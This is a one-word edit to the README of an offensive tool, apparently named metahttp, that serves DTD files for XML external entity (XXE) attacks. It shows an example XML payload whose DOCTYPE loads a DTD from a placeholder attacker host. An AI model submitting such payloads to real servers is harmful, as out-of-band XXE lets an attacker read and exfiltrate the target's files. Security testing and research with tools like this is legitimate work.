vp777/metahttp/Readme.md

 Initially the script waits for the target application to load the DTDs from the HTTP server it hosts.

-Next the attacker triggers the XXE on the target server by submitting for example the following XML:
+Next the attacker triggers the XXE on the target server by submitting for example the following XML data:
 ```xml
 <!DOCTYPE r SYSTEM "http://attacker_host/serveme.dtd"><r></r>
 ```